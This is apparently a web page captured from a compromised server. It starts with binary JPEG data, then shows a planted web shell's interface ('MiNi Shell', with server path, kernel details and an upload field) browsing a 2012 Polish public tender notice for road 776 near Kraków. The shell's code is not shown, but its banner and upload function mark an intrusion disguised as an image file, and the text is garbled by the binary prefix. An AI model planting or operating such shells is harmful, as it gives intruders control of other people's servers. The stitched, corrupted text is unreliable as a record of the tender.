JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120530/120137-N-2012.html

<p class="kh_header"><b>Kraków: Modernizacja drogi wojewódzkiej nr 776 Kraków - Proszowice - Ostrów- część I: Modernizacja drogi wojewódzkiej nr 776 od km 14+060 do km 18+336 - dokończenie robót</b><br>
<b>Numer ogłoszenia: 120137 - 2012; data zamieszczenia: 30.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Krakowie , ul. B. Głowackiego 56, 30-085 Kraków, woj. małopolskie, tel. 12 44 65 700, 44 65 810, faks 12 44 65 702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja drogi wojewódzkiej nr 776 Kraków - Proszowice - Ostrów- część I: Modernizacja drogi wojewódzkiej nr 776 od km 14+060 do km 18+336 - dokończenie robót.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 

        Zadanie 1  obejmujące odcinek od km 16+400 do km 16+800
1.Inwentaryzacja robót wykonanych przez poprzedniego wykonawcę na dzień przejęcia terenu budowy sporządzona w oparciu o  inwentaryzację geodezyjną przekazaną przez Zamawiającego
 
2.Utrzymanie istniejącej aktualnej tymczasowej organizacji ruchu na całym odcinku objętym zamówieniem tj.  od km 14+060 do km 18+336  

3.Organizacja ruchu na czas robót:  projekt, wykonanie, utrzymanie i likwidacja

4.Opracowanie dokumentacji projektowej na budowę  skrzyżowania typu rondo w m. Dojazdów  oraz wykonanie przebudowy drogi na odcinku od km 16+400 do km 16+800, / w tym chodników i fragmentów dróg zbiorczych/  wraz ze wszystkimi robotami towarzyszącymi  w  zakresie innych niezbędnych branż ,  tj. budową oświetlenia, przebudową sieci energetycznych, gazowych, telekomunikacyjnych i wodno-kanalizacyjnych, w oparciu  o Program funkcjonalno-użytkowy nr 2  wraz z pozyskaniem decyzji zezwalającej na wykonanie robót budowlanych   

5.Budowa  skrzyżowania typu rondo w m. Dojazdów  oraz wykonanie przebudowy drogi na odcinku od km 16+400 do km 16+800  /w tym chodników i fragmentów dróg zbiorczych/  wraz ze wszystkimi robotami towarzyszącymi  w  zakresie innych niezbędnych branż , tj. budową oświetlenia, przebudową sieci energetycznych, gazowych, telekomunikacyjnych i wodno-kanalizacyjnych, w oparciu  o dokumentację projektową opracowaną przez Wykonawcę i pozyskaną decyzję zezwalającą na wykonanie robót budowlanych.   

6.Opracowanie projektu docelowej organizacji ruchu

7.Wykonanie oznakowania pionowego w oparciu o projekt docelowej organizacji ruchu opracowany przez Wykonawcę

8.Wykonanie oznakowania poziomego cienkowarstwowego w oparciu o projekt docelowej organizacji ruchu  opracowany przez Wykonawcę

9.Pełnienie nadzoru autorskiego przez projektantów  będących przedstawicielami Wykonawcy /dot. całego przedmiotu całego zamówienia i wszystkich branż objętych zamówieniem dla zadania nr 1/

10.Sporządzenie inwentaryzacji powykonawczej 

11.Przygotowanie i złożenie wniosku o pozwolenie na użytkowanie lub zgłoszenia zakończenia robót i uzyskanie jego przyjęcia przez właściwy organ

12.Promocja projektu - wykonanie i montaż 1  tablicy  pamiątkowej   o wymiarach  2,0 m x 1,5 m z materiałów trwałych (pięcioletni okres gwarancji) o treści i  formie uzgodnionej  z Zamawiającym.

Zadanie 2  obejmujące odcinek od km 14+060 do km 16+400 oraz od km 16+800 do km 18+336
      
1. Inwentaryzacja robót wykonanych przez poprzedniego wykonawcę na dzień przejęcia terenu budowy sporządzona w oparciu o  inwentaryzację geodezyjną przekazaną przez Zamawiającego

2.Organizacja ruchu na czas robót:  projekt, wykonanie, utrzymanie   i  likwidacja

3.Opracowanie dokumentacji projektowej na odprowadzenie wód opadowych z kanalizacji deszczowej DW 776 do odbiornika w m. Dojazdów  w oparciu  o Program funkcjonalno-użytkowy nr 1  wraz z pozyskaniem decyzji zezwalającej na wykonanie robót budowlanych   

4.Wykonanie odprowadzenia wód opadowych z kanalizacji deszczowej DW 776 do odbiornika w m.Dojazdów  w oparciu  o dokumentację projektową opracowaną przez Wykonawcę i pozyskaną decyzję zezwalającą na wykonanie robót budowlanych   

5.Budowa dróg zbiorczych :  nr 2 od km 14+463,15 do km 14+690,18, nr 3 od km 16+800 do km 16+948,18,  nr 4 i nr 5 od km 17+152,00 do km 17+870,25 oraz nr 6 od km 17+870,25  do km 18+231,42  wraz z poboczami, zjazdami do posesji, odwodnieniem  i  barierami ochronnymi, w oparciu o  dokumentację projektową

6.Dokończenie budowy chodnika lewostronnego od km  14+910 do km  16+400 oraz od km 16+800 do km 17+557,50, obejmujące : uzupełnienie nasypów, wyrównanie i zagęszczenie  podbudowy z kruszywa,wykonanie nawierzchni z kostki brukowej wraz z podsypką, wbudowanie obrzeży, lokalne uzupełnienie
krawężników i ścieku przykrawężnikowego,  wykonanie zjazdów do posesji z betonowej kostki brukowej i kruszywa,  w oparciu o  dokumentację projektową i Inwentaryzację robót  wykonanych - chodnik lewostronny

7.Oświetlenie  - wykonanie robót branży elektroenergetycznej, w oparciu o  dokumentację projektową,w zakresie określonym w inwentaryzacji robót pozostałych do wykonania  wraz z wykonaniem uziemienia oraz  niezbędnych badań i sprawdzeń

8.Przebudowa  sieci energetycznej NN  w oparciu o  dokumentację projektową, w zakresie określonym w  inwentaryzacji robót pozostałych do wykonania  wraz  z opłatami za nadzór nad przebudową ze strony właścicieli sieci i uzupełnieniem dokumentów  formalno-prawnych

9.Przebudowa linii  teletechnicznej , w oparciu o  dokumentację projektową, w zakresie określonym w inwentaryzacji robót pozostałych do wykonania  wraz   z opłatami za nadzór nad przebudową ze strony właścicieli sieci i uzupełnieniem dokumentów  formalno-prawnych

10.Uzupełnienie oznaczeń sieci gazowej  /tabliczek, słupków/, w zakresie linii wyszczególnionych w inwentaryzacji robót pozostałych do wykonania  i uzupełnienie dokumentów  formalno-prawnych

11.Uzupełnienie elementów sieci wodociągowej i kanalizacyjnej  , według dokumentacji projektowej,w zakresie określonym w inwentaryzacji robót pozostałych do wykonania  i uzupełnieniem dokumentów formalno-prawnych

12.Wykonanie robót budowlanych w oparciu o dokumentację projektową Zamawiającego oraz nwentaryzację robót niewykonanych - dokończenie inwestycji po odstąpieniu Inwestora od umowy
      z poprzednim wykonawcą:
         a. roboty rozbiórkowe / rozbiórka chodników, wiaty, ogrodzeń, nawierzchni, zjazdów, pakamery /
         b. roboty ziemne
         c. wycinka drzew
         d. nawierzchnie i  podbudowy: z kruszywa, betonu asfaltowego, SMA
         e. budowa dróg zbiorczych, 
         f. wykonanie poboczy,
         g. budowa, przebudowa zjazdów na posesje 
         h. budowa, przebudowa chodników
         i. budowa, przebudowa zatok autobusowych i peronów przystankowych,
         j. przebudowa i budowa urządzeń odwadniających 
         k. umocnienie dna i skarp rowów
         l.mury oporowe, schody
         ł. montaż urządzeń bezpieczeństwa ruchu /stalowe bariery ochronne, poręcze /
         m. oznakowanie pionowe i poziome 
         n. zabezpieczenie i  przebudowa  sieci elektroenergetycznych wraz z opłatami
             za nadzór nad 
             przebudową ze strony właścicieli sieci
         o. uzupełnienie elementów sieci wodno-kanalizacyjnych, gazowych, i
             teletechnicznych wraz z  opłatami za nadzór nad  przebudową ze strony
             właścicieli sieci
         p.  budowa, przebudowa oświetlenia drogi
         r. roboty wykończeniowe i porządkowe / plantowanie i porządkowanie terenu budowy, humusowanie i obsiew skarp /
         s.  odtworzenie, wyznaczenie i montaż punktów referencyjnych
  
13.	Uzupełnienie oznakowania pionowego w oparciu o projekt docelowej organizacji ruchu / zestawienie brakujących znaków w Inwentaryzacji robót pozostałych do wykonania - oznakowanie poziome/

14.Wykonanie oznakowania poziomego cienkowarstwowego w oparciu o projekt docelowej organizacji ruchu 

15.	Pełnienie nadzoru autorskiego przez projektantów  będących przedstawicielami Wykonawcy /dot. całego przedmiotu całego zamówienia i wszystkich branż objętych zamówieniem / 

16.Uzupełnienie dokumentów  formalno-prawnych dla zjazdów do posesji i innych elementów wyszczególnionych w  Wykazie  zmian w projekcie budowlanym,  dla branży drogowej i konstrukcyjnej przez Projektantów pełniących nadzór autorski

17.Sporządzenie inwentaryzacji powykonawczej 

18.Przygotowanie i złożenie wniosku o pozwolenie na użytkowanie lub zgłoszenie zakończenia robót i uzyskanie jego przyjęcia przez właściwy organ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających zgodnie z art. 67 ust.1 pkt. 6. Ustawy z dnia 29 stycznia 2004r. Prawo zamówień
publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113 poz. 759) - zamówienia uzupełniające mogą zostać udzielone pod warunkiem konieczności kontynuacji zadania i posiadania na tę kontynuację środków finansowych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.14.00-9, 45.23.24.52-5, 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składając ofertę, wykonawca zobowiązany jest wnieść wadium przetargowe na czas równy okresowi związania 
ofertą w wysokości: 180 000 PLN.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje w tym zakresie szczególnych wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca spełnia warunek jeżeli wykaże, zrealizowanie 
w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej jedną robotę polegającą na budowie, przebudowie lub modernizacji drogi publicznej klasy G lub wyższej lub drogi odpowiadającej tym klasom, o wartości nie mniejszej niż 6 mln złotych. 
Na potwierdzenie warunku Wykonawca złoży Wykaz robót budowlanych - zał. SIWZ
wraz z załączeniem dokumentu potwierdzającego , że roboty zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- projektantami /którzy wykonywać będą dokumentacje projektową i pełnić nadzór autorski/ posiadającymi odpowiednie uprawnienia do projektowania w następujących branżach: drogowej, instalacyjnej w zakresie sieci: elektrycznych i elektroenergetycznych, sieci wodno-kanalizacyjnych, gazowych, teletechnicznych oraz branży konstrukcyjnej 
- kierownikiem budowy, posiadającym uprawnienia budowlane do wykonywania samodzielnych funkcji kierownika budowy bez ograniczeń w zakresie dróg, który wykaże się pełnieniem funkcji kierownika budowy robót drogowych na co najmniej dwóch zakończonych robotach budowlanych w zakresie dróg 

 Na potwierdzenie warunku Wykonawca złoży:
 Wykaz osób - zał. SIWZ                                               
 Oświadczenie o uprawnieniach  - zał. SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca spełnia warunek jeżeli wykaże, że dysponuje środkami finansowymi lub zdolnością kredytową w wysokości nie mniejszej niż 4 mln zł.
Na potwierdzenie warunku Wykonawca złoży: 
informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W przypadku gdy w informacji wartość posiadanych środków finansowych lub zdolność kredytowa została wykazana w innych walutach niż PLN, Wykonawca zobowiązany jest do przeliczenia tej waluty wg średniego kursu NBP na dzień wystawienia informacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 4.3.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym
albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby
lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia pkt. III 4.3.1 stosuje się odpowiednio.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie  od charakteru prawnego łączących go z nimi stosunków.  Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował  zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich  przy wykonaniu zmówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może być dokonana w przypadku zmian nieistotnych w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. 
      Ponadto zmiana umowy także istotna może być dokonana w przypadku okoliczności, których nie można było przewidzieć w chwili zawarcia  umowy, a w szczególności: 
       1)  niezależne od wykonawcy zmiany dotyczące osób kluczowych dla realizacji umowy (projektant,
            Kierownik budowy),zmiana ww. osób musi być uzasadniona przez wykonawcę i zaakceptowana
            przez zamawiającego. Kwalifikacje i doświadczenie  wskazanych osób muszą być co najmniej
            takie same jakie były wymagane w SIWZ.
       2)  niezależne od stron umowy wydłużenie terminu realizacji zamówienia z uwagi na okoliczności:
            - zmiany przepisów prawnych obowiązujących w dniu zawarcia umowy,
            - wystąpienia niezgodności pomiędzy częścią opisową, a kartograficzną ewidencji gruntów, 
            - przedłużeniu uległy procedury administracyjne na etapie wydawania opinii, uzgodnień,
              postanowień i decyzji administracyjnych nie wynikające z winy wykonawcy, 
            - wystąpienia nadzwyczajnych warunków pogodowych nie pozwalających na wykonanie
              zamówienia w  terminie, 
            - wystąpiły zamówienia dodatkowe niezbędne do prawidłowego wykonania zamówienia
              podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej
             do przewidzenia pod warunkiem wyrażenia zgody przez zamawiającego, 
	     - nastąpił sprzeciw właścicieli terenu na prowadzenie prac przygotowawczych (pomiary
             geodezyjne, odkrywki geologiczne itp.),
             Termin może ulec przedłużeniu o czas trwania tych okoliczności.
       3)  wystąpienia konieczności zmiany podwykonawcy dla części zamówienia, którą wykonawca
            wskazał w ofercie, że powierzy ją do wykonania podwykonawcy, za zgodą zamawiającego
            i z zachowaniem zasad dot. podwykonawców określonych we wzorze umowy, 
       4)  w szczególnie uzasadnionym przypadku wystąpienia konieczności realizacji przez podwykonawcę
           części zamówienia, której wykonawca nie wskazał w ofercie, że powierzy ją do wykonania
           podwykonawcy, za zgodą zamawiającego i z zachowaniem zasad dot. podwykonawców
           określonych we wzorze umowy,
       5) sytuacji gdy wykonawca opierał się na zasobach podmiotów trzecich wykazując spełnianie
           warunków udziału w postępowaniu, dopuszcza się zmianę tych podmiotów na etapie realizacji
           zamówienia, pod warunkiem, że nowy podmiot wykaże spełnienie warunków w zakresie nie
           mniejszym niż wskazany na etapie postępowania o zamówienie publiczne,  
       6) w przypadku zmian korzystnych dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać w siedzibie ZDW pok. 315
Materiały płatne: 4 629,01 zł. + opłata pocztowa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2012 godzina 09:30, miejsce: Zarząd Dróg Wojewódzkich w Krakowie, 30-085 Kraków ul. Głowackiego 56 p. 220.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin realizacji przedmiotu zamówienia: Zadanie 1  30/05/2014 r.
                                                       Zadanie 2  30/05/2013 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com